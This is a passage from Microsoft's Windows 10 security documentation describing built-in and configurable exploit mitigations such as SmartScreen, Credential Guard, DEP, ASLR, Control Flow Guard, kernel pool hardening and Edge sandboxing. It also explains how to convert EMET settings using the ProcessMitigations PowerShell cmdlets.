Guard policy that will deny and block execution of the C:\Windows\System32\SecConfig.efi tool.
Health attestation is a key feature of Windows 10 that includes client and cloud components to control access to
high-value assets based on a user and their device’s identity and compliance with corporate governance policy.
Organizations can choose to detect and report unhealthy devices, or to configure health enforcement rules based
on their needs. Health attestation provides an end-to-end security model and integration points, which vendors and
software developers can use to build and integrate a customized solution.
Related topics
Protect derived domain credentials with Credential Guard
Device Guard deployment guide
Trusted Platform Module technology overview
Mitigate threats by using Windows 10 security
features
Applies to:
Windows 10
This topic provides an overview of some of the software and firmware threats faced in the current security
landscape, and the mitigations that Windows 10 offers in response to these threats. For information about related
types of protection offered by Microsoft, see Related topics.
SECTION CONTENTS
The security threat landscape Describes the current nature of the security threat landscape,
and outlines how Windows 10 is designed to mitigate
software exploits and similar threats.
Windows 10 mitigations that you can configure Provides tables of configurable threat mitigations with links to
more information. Product features such as Device Guard
appear in Table 1, and memory protection options such as
Data Execution Prevention appear in Table 2.
Mitigations that are built in to Windows 10 Provides descriptions of Windows 10 mitigations that require
no configuration—they are built into the operating system.
For example, heap protections and kernel pool protections are
built into Windows 10.
Understanding Windows 10 in relation to the Enhanced Describes how mitigations in the Enhanced Mitigation
Mitigation Experience Toolkit Experience Toolkit (EMET) correspond to features built into
Windows 10 and how to convert EMET settings into
mitigation policies for Windows 10.
This topic focuses on pre-breach mitigations aimed at device protection and threat resistance. These protections
work with other security defenses in Windows 10, as shown in the following illustration:
Figure 1. Device protection and threat resistance as part of the Windows 10 security defenses
The security threat landscape

Today’s security threat landscape is one of aggressive and tenacious threats. In previous years, malicious attackers
mostly focused on gaining community recognition through their attacks or the thrill of temporarily taking a system
offline. Since then, attacker’s motives have shifted toward making money, including holding devices and data
hostage until the owner pays the demanded ransom. Modern attacks increasingly focus on large-scale intellectual
property theft; targeted system degradation that can result in financial loss; and now even cyberterrorism that
threatens the security of individuals, businesses, and national interests all over the world. These attackers are
typically highly trained individuals and security experts, some of whom are in the employ of nation states that have
large budgets and seemingly unlimited human resources. Threats like these require an approach that can meet this
challenge.
In recognition of this landscape, Windows 10 Creator's Update (Windows 10, version 1703) includes multiple
security features that were created to make it difficult (and costly) to find and exploit many software vulnerabilities.
These features are designed to:
Eliminate entire classes of vulnerabilities
Break exploitation techniques
Contain the damage and prevent persistence
Limit the window of opportunity to exploit
The following sections provide more detail about security mitigations in Windows 10, version 1703.
Windows 10 mitigations that you can configure

Windows 10 mitigations that you can configure are listed in the following two tables. The first table covers a wide
array of protections for devices and users across the enterprise and the second table drills down into specific
memory protections such as Data Execution Prevention. Memory protection options provide specific mitigations
against malware that attempts to manipulate memory in order to gain control of a system.
Table 1 Windows 10 mitigations that you can configure
MITIGATION AND CORRESPONDING THREAT DESCRIPTION AND LINKS
Windows Defender SmartScreen Windows Defender SmartScreen can check the reputation of a
helps prevent downloaded application by using a service that Microsoft
malicious applications maintains. The first time a user runs an app that originates
from being downloaded from the Internet (even if the user copied it from another PC),
SmartScreen checks to see if the app lacks a reputation or is
known to be malicious, and responds accordingly.
More information: Windows Defender SmartScreen, later in

this topic
Credential Guard Credential Guard uses virtualization-based security to isolate

helps keep attackers secrets, such as NTLM password hashes and Kerberos Ticket
from gaining access through Granting Tickets, so that only privileged system software can
Pass-the-Hash or access them.
Pass-the-Ticket attacks Credential Guard is included in Windows 10 Enterprise and
More information: Protect derived domain credentials with

Credential Guard
Enterprise certificate pinning Enterprise certificate pinning enables you to protect your
helps prevent internal domain names from chaining to unwanted certificates
man-in-the-middle attacks or to fraudulently issued certificates. With enterprise certificate
that leverage PKI pinning, you can “pin” (associate) an X.509 certificate and its
public key to its Certification Authority, either root or leaf.
More information: Enterprise Certificate Pinning
Device Guard Device Guard includes a Code Integrity policy that you create;
helps keep a device a whitelist of trusted apps—the only apps allowed to run in
from running malware or your organization. Device Guard also includes a powerful
other untrusted apps system mitigation called hypervisor-protected code integrity
(HVCI), which leverages virtualization-based security (VBS) to
protect Windows’ kernel-mode code integrity validation
process. HVCI has specific hardware requirements, and works
with Code Integrity policies to help stop attacks even if they
gain access to the kernel.
Device Guard is included in Windows 10 Enterprise and
More information: Introduction to Device Guard
Windows Defender Antivirus, Windows 10 includes Windows Defender Antivirus, a robust

which helps keep devices inbox antimalware solution. Windows Defender Antivirus has
free of viruses and other been significantly improved since it was introduced in
malware Windows 8.
More information: Windows Defender Antivirus, later in this

topic
Blocking of untrusted fonts Block Untrusted Fonts is a setting that allows you to prevent
helps prevent fonts users from loading fonts that are "untrusted" onto your
from being used in network, which can mitigate elevation-of-privilege attacks
elevation-of-privilege attacks associated with the parsing of font files. However, as of
Windows 10, version 1703, this mitigation is less important,
because font parsing is isolated in an AppContainer sandbox
(for a list describing this and other kernel pool protections, see
Kernel pool protections, later in this topic).
More information: Block untrusted fonts in an enterprise
Memory protections These mitigations, listed in Table 2, help to protect against

help prevent malware memory-based attacks, where malware or other code
from using memory manipulation manipulates memory to gain control of a system (for example,
techniques such as buffer malware that attempts to use buffer overruns to inject
overruns malicious executable code into memory. Note:
A subset of apps will not be able to run if some of these
mitigations are set to their most restrictive settings. Testing
can help you maximize protection while still allowing these
apps to run.
More information: Table 2, later in this topic

UEFI Secure Boot Unified Extensible Firmware Interface (UEFI) Secure Boot is a
helps protect security standard for firmware built in to PCs by
the platform from manufacturers beginning with Windows 8. It helps to protect
bootkits and rootkits the boot process and firmware against tampering, such as
from a physically present attacker or from forms of malware
that run early in the boot process or in kernel after startup.
More information: UEFI and Secure Boot
Early Launch Antimalware (ELAM) Early Launch Antimalware (ELAM) is designed to enable the
helps protect antimalware solution to start before all non-Microsoft drivers
the platform from and apps. If malware modifies a boot-related driver, ELAM will
rootkits disguised as drivers detect the change, and Windows will prevent the driver from
starting, thus blocking driver-based rootkits.
More information: Early Launch Antimalware
Device Health Attestation Device Health Attestation (DHA) provides a way to confirm
helps prevent that devices attempting to connect to an organization's
compromised devices from network are in a healthy state, not compromised with
accessing an organization’s malware. When DHA has been configured, a device’s actual
assets boot data measurements can be checked against the expected
"healthy" boot data. If the check indicates a device is
unhealthy, the device can be prevented from accessing the
network.
More information: Control the health of Windows 10-based

devices and Device Health Attestation
Configurable Windows 10 mitigations designed to help protect against memory manipulation require in-depth
understanding of these threats and mitigations and knowledge about how the operating system and applications
handle memory. The standard process for maximizing these types of mitigations is to work in a test lab to discover
whether a given setting interferes with any applications that you use so that you can deploy settings that maximize
protection while still allowing apps to run correctly.
As an IT professional, you can ask application developers and software vendors to deliver applications that include
an additional protection called Control Flow Guard (CFG ). No configuration is needed in the operating system—
the protection is compiled into applications. More information can be found in Control Flow Guard.
Table 2 Configurable Windows 10 mitigations designed to help protect against memory exploits
MITIGATION AND CORRESPONDING THREAT DESCRIPTION
Data Execution Prevention (DEP) Data Execution Prevention (DEP) is a system-level memory
helps prevent protection feature available in Windows operating systems.
exploitation of buffer overruns DEP enables the operating system to mark one or more pages
of memory as non-executable, which prevents code from
being run from that region of memory, to help prevent
exploitation of buffer overruns.
DEP helps prevent code from being run from data pages such
as the default heap, stacks, and memory pools. Although
some applications have compatibility problems with DEP, the
vast majority of applications do not.
More information: Data Execution Prevention, later in this
topic.
Group Policy settings: DEP is on by default for 64-bit

applications, but you can configure additional DEP protections
by using the Group Policy settings described in Override
Process Mitigation Options to help enforce app-related
security policies.
SEHOP Structured Exception Handling Overwrite Protection

helps prevent (SEHOP) is designed to help block exploits that use the
overwrites of the Structured Exception Handler (SEH) overwrite technique.
Structured Exception Handler Because this protection mechanism is provided at run-time, it
helps to protect apps regardless of whether they have been
compiled with the latest improvements. A few applications
have compatibility problems with SEHOP, so be sure to test
for your environment.
More information: Structured Exception Handling Overwrite
Protection, later in this topic.
Group Policy setting: SEHOP is on by default for 64-bit

applications, but you can configure additional SEHOP
protections by using the Group Policy setting described in
Override Process Mitigation Options to help enforce app-
related security policies.
ASLR Address Space Layout Randomization (ASLR) loads DLLs

helps mitigate malware into random memory addresses at boot time. This helps
attacks based on mitigate malware that's designed to attack specific memory
expected memory locations locations, where specific DLLs are expected to be loaded.
More information: Address Space Layout Randomization,
later in this topic.
Group Policy settings: ASLR is on by default for 64-bit

applications, but you can configure additional ASLR
protections by using the Group Policy settings described in
Override Process Mitigation Options to help enforce app-
related security policies.
Windows Defender SmartScreen

Windows Defender SmartScreen notifies users if they click on reported phishing and malware websites, and helps
protect them against unsafe downloads or make informed decisions about downloads.
For Windows 10, Microsoft improved SmartScreen (now called Windows Defender SmartScreen) protection
capability by integrating its app reputation abilities into the operating system itself, which allows SmartScreen to
check the reputation of files downloaded from the Internet and warn users when they’re about to run a high-risk
downloaded file. The first time a user runs an app that originates from the Internet, SmartScreen checks the
reputation of the application by using digital signatures and other factors against a service that Microsoft
maintains. If the app lacks a reputation or is known to be malicious, SmartScreen warns the user or blocks
execution entirely, depending on how the administrator has configured Microsoft Intune or Group Policy settings.
For more information, see Windows Defender SmartScreen overview.
Windows Defender Antivirus in Windows 10 uses a multi-pronged approach to improve antimalware:
Cloud-delivered protection helps detect and block new malware within seconds, even if the malware has
never been seen before. The service, available as of Windows 10, version 1703, uses distributed resources
and machine learning to deliver protection to endpoints at a rate that is far faster than traditional signature
updates.
Rich local context improves how malware is identified. Windows 10 informs Windows Defender Antivirus
not only about content like files and processes but also where the content came from, where it has been
stored, and more. The information about source and history enables Windows Defender Antivirus to apply
different levels of scrutiny to different content.
Extensive global sensors help keep Windows Defender Antivirus current and aware of even the newest
malware. This is accomplished in two ways: by collecting the rich local context data from end points and by
centrally analyzing that data.
Tamper proofing helps guard Windows Defender Antivirus itself against malware attacks. For example,
Windows Defender Antivirus uses Protected Processes, which prevents untrusted processes from
attempting to tamper with Windows Defender Antivirus components, its registry keys, and so on. (Protected
Processes is described later in this topic.)
Enterprise-level features give IT pros the tools and configuration options necessary to make Windows
Defender Antivirus an enterprise-class antimalware solution.
For more information, see Windows Defender in Windows 10 and Windows Defender Overview for Windows
Server.
For information about Windows Defender Advanced Threat Protection, a service that helps enterprises to detect,
investigate, and respond to advanced and targeted attacks on their networks, see Windows Defender Advanced
Threat Protection (ATP ) (resources) and Windows Defender Advanced Threat Protection (ATP ) (documentation).
Data Execution Prevention
Malware depends on its ability to insert a malicious payload into memory with the hope that it will be executed
later. Wouldn’t it be great if you could prevent malware from running if it wrote to an area that has been allocated
solely for the storage of information?
Data Execution Prevention (DEP ) does exactly that, by substantially reducing the range of memory that malicious
code can use for its benefit. DEP uses the No eXecute bit on modern CPUs to mark blocks of memory as read-only
so that those blocks can’t be used to execute malicious code that may be inserted by means of a vulnerability
exploit.
To use Task Manager to see apps that use DEP
1. Open Task Manager: Press Ctrl+Alt+Del and select Task Manager, or search the Start screen.
2. Click More Details (if necessary), and then click the Details tab.
3. Right-click any column heading, and then click Select Columns.
4. In the Select Columns dialog box, select the last Data Execution Prevention check box.
5. Click OK.
You can now see which processes have DEP enabled.
Figure 2. Processes on which DEP has been enabled in Windows 10
You can use Control Panel to view or change DEP settings.
To use Control Panel to view or change DEP settings on an individual PC
1. Open Control Panel, System: click Start, type Control Panel System, and press ENTER.
2. Click Advanced system settings, and then click the Advanced tab.
3. In the Performance box, click Settings.
4. In Performance Options, click the Data Execution Prevention tab.
5. Select an option:
Turn on DEP for essential Windows programs and services only
Turn on DEP for all programs and services except those I select. If you choose this option, use
the Add and Remove buttons to create the list of exceptions for which DEP will not be turned on.
To use Group Policy to control DEP settings
You can use the Group Policy setting called Process Mitigation Options to control DEP settings. A few
applications have compatibility problems with DEP, so be sure to test for your environment. To use the Group
Policy setting, see Override Process Mitigation Options to help enforce app-related security policies.
Structured Exception Handling Overwrite Protection
Structured Exception Handling Overwrite Protection (SEHOP ) helps prevent attackers from being able to use
malicious code to exploit the Structured Exception Handler (SEH), which is integral to the system and allows (non-
malicious) apps to handle exceptions appropriately. Because this protection mechanism is provided at run-time, it
helps to protect applications regardless of whether they have been compiled with the latest improvements.
You can use the Group Policy setting called Process Mitigation Options to control the SEHOP setting. A few
applications have compatibility problems with SEHOP, so be sure to test for your environment. To use the Group
Policy setting, see Override Process Mitigation Options to help enforce app-related security policies.
Address Space Layout Randomization
One of the most common techniques used to gain access to a system is to find a vulnerability in a privileged
process that is already running, guess or find a location in memory where important system code and data have
been placed, and then overwrite that information with a malicious payload. Any malware that could write directly
to the system memory could simply overwrite it in well-known and predictable locations.
Address Space Layout Randomization (ASLR ) makes that type of attack much more difficult because it randomizes
how and where important data is stored in memory. With ASLR, it is more difficult for malware to find the specific
location it needs to attack. Figure 3 illustrates how ASLR works by showing how the locations of different critical
Windows components can change in memory between restarts.
Figure 3. ASLR at work

Windows 10 applies ASLR holistically across the system and increases the level of entropy many times compared
with previous versions of Windows to combat sophisticated attacks such as heap spraying. 64-bit system and
application processes can take advantage of a vastly increased memory space, which makes it even more difficult
for malware to predict where Windows 10 stores vital data. When used on systems that have TPMs, ASLR
memory randomization will be increasingly unique across devices, which makes it even more difficult for a
successful exploit that works on one system to work reliably on another.
You can use the Group Policy setting called Process Mitigation Options to control ASLR settings (“Force ASLR”
and “Bottom-up ASLR”), as described in Override Process Mitigation Options to help enforce app-related security
policies.
Mitigations that are built in to Windows 10

Windows 10 provides many threat mitigations to protect against exploits that are built into the operating system
and need no configuration within the operating system. The table that follows describes some of these mitigations.
Control Flow Guard (CFG ) is a mitigation that does not need configuration within the operating system, but does
require that an application developer configure the mitigation into the application when it’s compiled. CFG is built
into Microsoft Edge, IE11, and other areas in Windows 10, and can be built into many other applications when they
are compiled.
Table 3 Windows 10 mitigations to protect against memory exploits – no configuration needed
SMB hardening for SYSVOL and NETLOGON shares Client connections to the Active Directory Domain Services
helps mitigate default SYSVOL and NETLOGON shares on domain controllers
man-in-the-middle attacks now require SMB signing and mutual authentication (such as
Kerberos).
More information: SMB hardening improvements for

SYSVOL and NETLOGON shares, later in this topic.
Protected Processes With the Protected Processes feature, Windows 10 prevents

help prevent one process untrusted processes from interacting or tampering with those
from tampering with another that have been specially signed.
process
More information: Protected Processes, later in this topic.
Universal Windows apps protections Universal Windows apps are carefully screened before being
screen downloadable made available, and they run in an AppContainer sandbox
apps and run them in with limited privileges and capabilities.
an AppContainer sandbox
More information: Universal Windows apps protections, later
in this topic.
Heap protections Windows 10 includes protections for the heap, such as the use
help prevent of internal data structures which help protect against
exploitation of the heap corruption of memory used by the heap.
More information: Windows heap protections, later in this

topic.
Kernel pool protections Windows 10 includes protections for the pool of memory used
help prevent by the kernel. For example, safe unlinking protects against
exploitation of pool memory pool overruns that are combined with unlinking operations
used by the kernel that can be used to create an attack.
More information: Kernel pool protections, later in this topic.
Control Flow Guard Control Flow Guard (CFG) is a mitigation that requires no
helps mitigate exploits configuration within the operating system, but instead is built
that are based on into software when it’s compiled. It is built into Microsoft Edge,
flow between code locations IE11, and other areas in Windows 10. CFG can be built into
in memory applications written in C or C++, or applications compiled
using Visual Studio 2015.
For such an application, CFG can detect an attacker’s attempt
to change the intended flow of code. If this occurs, CFG
terminates the application. You can request software vendors
to deliver Windows applications compiled with CFG enabled.
More information: Control Flow Guard, later in this topic.
Protections built into Microsoft Edge (the browser) Windows 10 includes an entirely new browser, Microsoft Edge,
helps mitigate multiple designed with multiple security improvements.
threats
More information: Microsoft Edge and Internet Explorer 11,
later in this topic.
SMB hardening improvements for SYSVOL and NETLOGON shares

In Windows 10 and Windows Server 2016, client connections to the Active Directory Domain Services default
SYSVOL and NETLOGON shares on domain controllers require Server Message Block (SMB ) signing and mutual
authentication (such as Kerberos). This reduces the likelihood of man-in-the-middle attacks. If SMB signing and
mutual authentication are unavailable, a computer running Windows 10 or Windows Server 2016 won’t process
domain-based Group Policy and scripts.
NOTE
The registry values for these settings aren’t present by default, but the hardening rules still apply until overridden by Group
Policy or other registry values. For more information on these security improvements, (also referred to as UNC hardening),
see Microsoft Knowledge Base article 3000483 and MS15-011 & MS15-014: Hardening Group Policy.
Protected Processes
Most security controls are designed to prevent the initial infection point. However, despite all the best preventative
controls, malware might eventually find a way to infect the system. So, some protections are built to place limits on
malware that gets on the device. Protected Processes creates limits of this type.
With Protected Processes, Windows 10 prevents untrusted processes from interacting or tampering with those
that have been specially signed. Protected Processes defines levels of trust for processes. Less trusted processes
are prevented from interacting with and therefore attacking more trusted processes. Windows 10 uses Protected
Processes more broadly across the operating system, and as in Windows 8.1, implements them in a way that can
be used by 3rd party anti-malware vendors, as described in Protecting Anti-Malware Services. This helps make the
system and antimalware solutions less susceptible to tampering by malware that does manage to get on the
system.
Universal Windows apps protections
When users download Universal Windows apps from the Microsoft Store, it’s unlikely that they will encounter
malware because all apps go through a careful screening process before being made available in the store. Apps
that organizations build and distribute through sideloading processes will need to be reviewed internally to ensure
that they meet organizational security requirements.
Regardless of how users acquire Universal Windows apps, they can use them with increased confidence. Universal
Windows apps run in an AppContainer sandbox with limited privileges and capabilities. For example, Universal
Windows apps have no system-level access, have tightly controlled interactions with other apps, and have no
access to data unless the user explicitly grants the application permission.
In addition, all Universal Windows apps follow the security principle of least privilege. Apps receive only the
minimum privileges they need to perform their legitimate tasks, so even if an attacker exploits an app, the damage
the exploit can do is severely limited and should be contained within the sandbox. The Microsoft Store displays the
exact capabilities the app requires (for example, access to the camera), along with the app’s age rating and
publisher.
Windows heap protections
The heap is a location in memory that Windows uses to store dynamic application data. Windows 10 continues to
improve on earlier Windows heap designs by further mitigating the risk of heap exploits that could be used as part
of an attack.
Windows 10 has several important improvements to the security of the heap:
Heap metadata hardening for internal data structures that the heap uses, to improve protections against
memory corruption.
Heap allocation randomization, that is, the use of randomized locations and sizes for heap memory
allocations, which makes it more difficult for an attacker to predict the location of critical memory to
overwrite. Specifically, Windows 10 adds a random offset to the address of a newly allocated heap, which
makes the allocation much less predictable.
Heap guard pages before and after blocks of memory, which work as tripwires. If an attacker attempts to
write past a block of memory (a common technique known as a buffer overflow ), the attacker will have to
overwrite a guard page. Any attempt to modify a guard page is considered a memory corruption, and
Windows 10 responds by instantly terminating the app.
Kernel pool protections
The operating system kernel in Windows sets aside two pools of memory, one that remains in physical memory
(“nonpaged pool”) and one that can be paged in and out of physical memory (“paged pool”). There are many types
of attacks that have been attempted against these pools, such as process quota pointer encoding; lookaside, delay
free, and pool page cookies; and PoolIndex bounds checks. Windows 10 has multiple “pool hardening” protections,
such as integrity checks, that help protect the kernel pool against such attacks.
In addition to pool hardening, Windows 10 includes other kernel hardening features:
Kernel DEP and Kernel ASLR: Follow the same principles as Data Execution Prevention and Address
Space Layout Randomization, described earlier in this topic.
Font parsing in AppContainer: Isolates font parsing in an AppContainer sandbox.
Disabling of NT Virtual DOS Machine (NTVDM ): The old NTVDM kernel module (for running 16-bit
applications) is disabled by default, which neutralizes the associated vulnerabilities. (Enabling NTVDM
decreases protection against Null dereference and other exploits.)
Supervisor Mode Execution Prevention (SMEP ): Helps prevent the kernel (the “supervisor”) from
executing code in user pages, a common technique used by attackers for local kernel elevation of privilege
(EOP ). This requires processor support found in Intel Ivy Bridge or later processors, or ARM with PXN
support.
Safe unlinking: Helps protect against pool overruns that are combined with unlinking operations to create
an attack. Windows 10 includes global safe unlinking, which extends heap and kernel pool safe unlinking to
all usage of LIST_ENTRY and includes the “FastFail” mechanism to enable rapid and safe process
termination.
Memory reservations: The lowest 64 KB of process memory is reserved for the system. Apps are not
allowed to allocate that portion of the memory. This makes it more difficult for malware to use techniques
such as “NULL dereference” to overwrite critical system data structures in memory.
Control Flow Guard
When applications are loaded into memory, they are allocated space based on the size of the code, requested
memory, and other factors. When an application begins to execute code, it calls additional code located in other
memory addresses. The relationships between the code locations are well known—they are written in the code
itself—but previous to Windows 10, the flow between these locations was not enforced, which gave attackers the
opportunity to change the flow to meet their needs.
This kind of threat is mitigated in Windows 10 through the Control Flow Guard (CFG ) feature. When a trusted
application that was compiled to use CFG calls code, CFG verifies that the code location called is trusted for
execution. If the location is not trusted, the application is immediately terminated as a potential security risk.
An administrator cannot configure CFG; rather, an application developer can take advantage of CFG by configuring
it when the application is compiled. Consider asking application developers and software vendors to deliver
trustworthy Windows applications compiled with CFG enabled. For example, it can be enabled for applications
written in C or C++, or applications compiled using Visual Studio 2015. For information about enabling CFG for a
Visual Studio 2015 project, see Control Flow Guard.
Of course, browsers are a key entry point for attacks, so Microsoft Edge, IE, and other Windows features take full
advantage of CFG.
Microsoft Edge and Internet Explorer 11
Browser security is a critical component of any security strategy, and for good reason: the browser is the user’s
interface to the Internet, an environment with many malicious sites and content waiting to attack. Most users
cannot perform at least part of their job without a browser, and many users are completely reliant on one. This
reality has made the browser the common pathway from which malicious hackers initiate their attacks.
All browsers enable some amount of extensibility to do things beyond the original scope of the browser. Two
common examples of this are Flash and Java extensions that enable their respective applications to run inside a
browser. Keeping Windows 10 secure for web browsing and applications, especially for these two content types, is
a priority.
Windows 10 includes an entirely new browser, Microsoft Edge. Microsoft Edge is more secure in multiple ways,
especially:
Smaller attack surface; no support for non-Microsoft binary extensions. Multiple browser
components with vulnerable attack surfaces have been removed from Microsoft Edge. Components that
have been removed include legacy document modes and script engines, Browser Helper Objects (BHOs),
ActiveX controls, and Java. However, Microsoft Edge supports Flash content and PDF viewing by default
through built-in extensions.
Runs 64-bit processes. A 64-bit PC running an older version of Windows often runs in 32-bit compatibility
mode to support older and less secure extensions. When Microsoft Edge runs on a 64-bit PC, it runs only
64-bit processes, which are much more secure against exploits.
Includes Memory Garbage Collection (MemGC ). This helps protect against use-after-free (UAF ) issues.
Designed as a Universal Windows app. Microsoft Edge is inherently compartmentalized and runs in an
AppContainer that sandboxes the browser from the system, data, and other apps. IE11 on Windows 10 can
also take advantage of the same AppContainer technology through Enhanced Protect Mode. However,
because IE11 can run ActiveX and BHOs, the browser and sandbox are susceptible to a much broader range
of attacks than Microsoft Edge.
Simplifies security configuration tasks. Because Microsoft Edge uses a simplified application structure
and a single sandbox configuration, there are fewer required security settings. In addition, Microsoft Edge
default settings align with security best practices, which makes it more secure by default.
In addition to Microsoft Edge, Microsoft includes IE11 in Windows 10, primarily for backwards-compatibility with
websites and with binary extensions that do not work with Microsoft Edge. It should not be configured as the
primary browser but rather as an optional or automatic switchover. We recommend using Microsoft Edge as the
primary web browser because it provides compatibility with the modern web and the best possible security.
For sites that require IE11 compatibility, including those that require binary extensions and plug ins, enable
Enterprise mode and use the Enterprise Mode Site List to define which sites have the dependency. With this
configuration, when Microsoft Edge identifies a site that requires IE11, users will automatically be switched to IE11.
Functions that software vendors can use to build mitigations into apps
Some of the protections available in Windows 10 are provided through functions that can be called from apps or
other software. Such software is less likely to provide openings for exploits. If you are working with a software
vendor, you can request that they include these security-oriented functions in the application. The following table
lists some types of mitigations and the corresponding security-oriented functions that can be used in apps.
NOTE
Control Flow Guard (CFG) is also an important mitigation that a developer can include in software when it is compiled. For
more information, see Control Flow Guard, earlier in this topic.
Table 4 Functions available to developers for building mitigations into apps

MITIGATION FUNCTION
LoadLib image loading restrictions UpdateProcThreadAttribute function

[PROCESS_CREATION_MITIGATION_POLICY_IMAGE_LOAD_N
O_REMOTE_ALWAYS_ON]
MemProt dynamic code restriction UpdateProcThreadAttribute function

[PROCESS_CREATION_MITIGATION_POLICY_PROHIBIT_DYNA
MIC_CODE_ALWAYS_ON]
Child Process Restriction to restrict the ability to create child UpdateProcThreadAttribute function
processes [PROC_THREAD_ATTRIBUTE_CHILD_PROCESS_POLICY]
Code Integrity Restriction to restrict image loading SetProcessMitigationPolicy function

[ProcessSignaturePolicy]
Win32k System Call Disable Restriction to restrict ability to use SetProcessMitigationPolicy function
NTUser and GDI [ProcessSystemCallDisablePolicy]
High Entropy ASLR for up to 1TB of variance in memory UpdateProcThreadAttribute function

allocations [PROCESS_CREATION_MITIGATION_POLICY_HIGH_ENTROPY_
ASLR_ALWAYS_ON]
Strict handle checks to raise immediate exception upon bad UpdateProcThreadAttribute function
handle reference [PROCESS_CREATION_MITIGATION_POLICY_STRICT_HANDLE_
CHECKS_ALWAYS_ON]
Extension point disable to block the use of certain third-party UpdateProcThreadAttribute function
extension points [PROCESS_CREATION_MITIGATION_POLICY_EXTENSION_POI
NT_DISABLE_ALWAYS_ON]
Heap terminate on corruption to protect the system against a UpdateProcThreadAttribute function

corrupted heap [PROCESS_CREATION_MITIGATION_POLICY_HEAP_TERMINAT
E_ALWAYS_ON]
Understanding Windows 10 in relation to the Enhanced Mitigation

Experience Toolkit
You might already be familiar with the Enhanced Mitigation Experience Toolkit (EMET), which has since 2009
offered a variety of exploit mitigations, and an interface for configuring those mitigations. You can use this section
to understand how EMET mitigations relate to those in Windows 10. Many of EMET’s mitigations have been built
into Windows 10, some with additional improvements. However, some EMET mitigations carry high performance
cost, or appear to be relatively ineffective against modern threats, and therefore have not been brought into
Windows 10.
Because many of EMET’s mitigations and security mechanisms already exist in Windows 10 and have been
improved, particularly those assessed to have high effectiveness at mitigating known bypasses, version 5.5x has
been announced as the final major version release for EMET (see Enhanced Mitigation Experience Toolkit).
The following table lists EMET features in relation to Windows 10 features.
Table 5 EMET features in relation to Windows 10 features
HOW THESE EMET FEATURES MAP
SPECIFIC EMET FEATURES TO WINDOWS 10 FEATURES
DEP DEP, SEHOP and ASLR are included in Windows 10 as

configurable features. See Table 2, earlier in this topic.
SEHOP
You can install the ProcessMitigations PowerShell module
ASLR (Force ASLR, Bottom-up ASLR) to convert your EMET settings for these features into
policies that you can apply to Windows 10.
Load Library Check (LoadLib) LoadLib and MemProt are supported in Windows 10, for all
applications that are written to use these functions. See Table
Memory Protection Check (MemProt) 4, earlier in this topic.
Null Page Mitigations for this threat are built into Windows 10, as
described in the “Memory reservations” item in Kernel pool
protections, earlier in this topic.
Heap Spray Windows 10 does not include mitigations that map specifically
to these EMET features because they have low impact in the
EAF current threat landscape, and do not significantly increase the
EAF+ difficulty of exploiting vulnerabilities. Microsoft remains
committed to monitoring the security environment as new
exploits appear and taking steps to harden the operating
system against them.
Caller Check Mitigated in Windows 10 with applications compiled with

Control Flow Guard, as described in Control Flow Guard,
Simulate Execution Flow earlier in this topic.
Stack Pivot
Deep Hooks (an ROP “Advanced Mitigation”)
Anti Detours (an ROP “Advanced Mitigation”)
Banned Functions (an ROP “Advanced Mitigation”)
Converting an EMET XML settings file into Windows 10 mitigation policies

One of EMET’s strengths is that it allows you to import and export configuration settings for EMET mitigations as
an XML settings file for straightforward deployment. To generate mitigation policies for Windows 10 from an
EMET XML settings file, you can install the ProcessMitigations PowerShell module. In an elevated PowerShell
session, run this cmdlet:
Install-Module -Name ProcessMitigations
The Get-ProcessMitigation cmdlet gets the current mitigation settings from the registry or from a running process,
or it can save all settings to an XML file.
To get the current settings on all running instances of notepad.exe:
Get-ProcessMitigation -Name notepad.exe -RunningProcess
To get the current settings in the registry for notepad.exe:

Get-ProcessMitigation -Name notepad.exe
To get the current settings for the running process with pid 1304:
Get-ProcessMitigation -Id 1304
To get the all process mitigation settings from the registry and save them to the xml file settings.xml:
Get-ProcessMitigation -RegistryConfigFilePath settings.xml
The Set-ProcessMitigation cmdlet can enable and disable process mitigations or set them in bulk from an XML file.
To get the current process mitigation for "notepad.exe" from the registry and then enable MicrosoftSignedOnly and
disable MandatoryASLR:
Set-ProcessMitigation -Name Notepad.exe -Enable MicrosoftSignedOnly -Disable MandatoryASLR
To set the process mitigations from an XML file (which can be generated from get-ProcessMitigation -
RegistryConfigFilePath settings.xml):
Set-ProcessMitigation -PolicyFilePath settings.xml
To set the system default to be MicrosoftSignedOnly:
Set-ProcessMitigation -System -Enable MicrosoftSignedOnly
The ConvertTo-ProcessMitigationPolicy cmdlet converts mitigation policy file formats. The syntax is:
ConvertTo-ProcessMitigationPolicy -EMETFilePath <String> -OutputFilePath <String> [<CommonParameters>]
Examples:
Convert EMET settings to Windows 10 settings: You can run ConvertTo-ProcessMitigationPolicy and
provide an EMET XML settings file as input, which will generate a result file of Windows 10 mitigation
settings. For example:
ConvertTo-ProcessMitigationPolicy -EMETFilePath policy.xml -OutputFilePath result.xml
Audit and modify the converted settings (the output file): Additional cmdlets let you apply, enumerate,
enable, disable, and save settings in the output file. For example, this cmdlet enables SEHOP and disables
MandatoryASLR and DEPATL registry settings for Notepad:
Set-ProcessMitigation -Name notepad.exe -Enable SEHOP -Disable MandatoryASLR,DEPATL
Convert Attack surface reduction (ASR) settings to a Code Integrity policy file: If the input file
contains any settings for EMET’s Attack surface reduction (ASR ) mitigation, the converter will also create a
Code Integrity policy file. In this case, you can complete the merging, auditing, and deployment process for
the Code Integrity policy, as described in Deploy Device Guard: deploy code integrity policies. This will
enable protections on Windows 10 equivalent to EMET’s ASR protections.
Convert Certificate Trust settings to enterprise certificate pinning rules: If you have an EMET
“Certificate Trust” XML file (pinning rules file), you can also use ConvertTo-ProcessMitigationPolicy to
convert the pinning rules file into an enterprise certificate pinning rules file. Then you can finish enabling
that file as described in Enterprise Certificate Pinning. For example:
ConvertTo-ProcessMitigationPolicy -EMETfilePath certtrustrules.xml -OutputFilePath

enterprisecertpinningrules.xml
EMET-related products
Microsoft Consulting Services (MCS ) and Microsoft Support/Premier Field Engineering (PFE ) offer a range of
options for EMET, support for EMET, and EMET-related reporting and auditing products such as the EMET
Enterprise Reporting Service (ERS ). For any enterprise customers who use such products today or who are
interested in similar capabilities, we recommend evaluating Windows Defender Advanced Threat Protection (ATP ).
Related topics
Security and Assurance in Windows Server 2016
Windows Defender Advanced Threat Protection (ATP ) - resources
Windows Defender Advanced Threat Protection (ATP ) - documentation
Exchange Online Advanced Threat Protection Service Description
Office 365 Advanced Threat Protection
Microsoft Malware Protection Center
Override Process Mitigation Options to help enforce
app-related security policies
Applies to:
Windows 10, version 1607
Windows Server 2016
Windows 10 includes Group Policy-configurable “Process Mitigation Options” that add advanced protections against
memory-based attacks, that is, attacks where malware manipulates memory to gain control of a system. For example,
